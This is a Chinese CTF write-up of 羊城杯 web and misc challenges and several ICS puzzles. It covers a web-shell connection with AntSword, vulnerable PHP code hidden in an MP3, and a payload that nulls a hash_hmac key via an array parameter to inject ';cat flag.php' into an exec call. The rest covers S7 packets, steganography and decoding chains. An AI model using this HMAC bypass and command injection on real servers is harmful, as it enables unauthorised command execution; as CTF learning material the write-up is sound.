羊城杯

easycon

m0re
环境打开
m0re
dirsearch扫描得到两个可以访问的文件
一个是index.html、另一个是index.php访问index.php会有个弹窗,看到
m0re
题目中提示菜刀。所以猜测这个是连接密码。
使用蚁剑连接,成功连接。
m0re
但是,那个bbbbbbb.txt没有flag,是base64转图片,使用在线网站可以直接转换得到图片,这个是需要加上一个头的,缺少图片头的格式。
m0re

BlackCat

黑猫警长音乐,在HTML中找到MP3文件,下载到本地。然后在010editor中打开在最后发现了PHP代码
m0re

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
//post传入Black-Cat-Sheriff和One-ear绕过判断
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('谁!竟敢踩我一只耳的尾巴!');
}

$clandestine = getenv("clandestine"); //获取一个环境变量的值
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine); //使用 HMAC 方法生成带有密钥的哈希值
//PHP的类型自动转换,控制的变量只有One-ear和White-cat-monitor
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}

echo exec("nc".$_POST['One-ear']);

这个看到一道类似的题目。代码审计——小题
同样使用hash_hmac函数

1
2
3
<?php
var_dump(hash_hmac('sha256', ';cat flag.php', NULL));
?>

最后payload

1
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php&nonce[]=1

工控杯

签到

给了一个西门子s7报文,是写入数据的。所以只需要得到返回数据的字符串就行了。
一组西门子S7报文。
03 00 00 16 11 E0 00 00 00 01 00 C1 02 10 00 C2 02 03 01 C0 01 0A(第一次握手报文)
03 00 00 16 11 D0 00 01 00 11 00 C0 01 0A C1 02 10 00 C2 02 03 01(第一次握手返回)
03 00 00 19 02 F0 80 32 01 00 00 CC C1 00 08 00 00 F0 00 00 01 00 01 03 C0(第二次握手报文)
03 00 00 1B 02 F0 80 32 03 00 00 CC C1 00 08 00 00 00 00 F0 00 00 01 00 01 00 F0(第二次握手返回)
03 00 00 43 02 F0 80 32 01 00 00 00 05 00 32 00 00 04 04 12 0A 10 02 00 01 00 00 81 00 00 00 12 0A 10 02 00 01 00 00 82 00 00 00 12 0A 10 02 00 01 00 00 83 00 00 00 12 0A 10 02 00 08 00 01 84 00 00 00(读取数据-)
03 00 00 2F 02 F0 80 32 03 00 00 00 05 00 02 00 1A 00 00 04 04 FF 04 00 08 00 00 FF 04 00 08 01 00 FF 04 00 08 F2 00 FF 04 00 20 AB CD EF 01(读取数据返回)
03 00 00 24 02 F0 80 32 01 00 00 00 09 00 0E 00 05 05 01 12 0A 10 01 00 01 00 00 83 00 00 29 00 03 00 01 01(写入数据)
03 00 00 16 02 F0 80 32 03 00 00 00 09 00 02 00 01 00 00 05 01 FF(写入数据返回)
找到了这个博客——一组西门子S7报文
将写入数据返回的报文发到公众号就行了。

ICS_1

stegsolve+拼图,一个GIF动态图,逐帧查看,得到9张图片,然后在PPT里拼一下就行了,
中间的那张图跟其他图拼接处有的需要手工加一些点,才可以扫描出来。

ICS_4

一个文件拖进kali中发现是个image图片,所以改成jpg格式就得到了一张可以打开的图片,然后使用foremost分离一下试试,有个压缩包,有密码的,在图片的详细信息中看到
m0re
很像base64编码,进行解码
m0re
应该是压缩包密码了
里面是图片,在进行stegsolve分析的时候,在file format中看到flag
m0re

ICS_10

pdf文件,一张图片。攻防世界原题,先转换成word文档,flag就在图片下面隐藏着。
m0re

ICS_12

ISCC2018的一个原题
一张猫的图片,foremost分离得到word文档,文档内的内容

1
如是我闻:名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通

展开:
m0re
m0re
然后进行hex转str,转base64,转base32,转base16,转base64,转base32,最后再转base16就得到了flag

太菜了,继续努力,跟着学长好好学。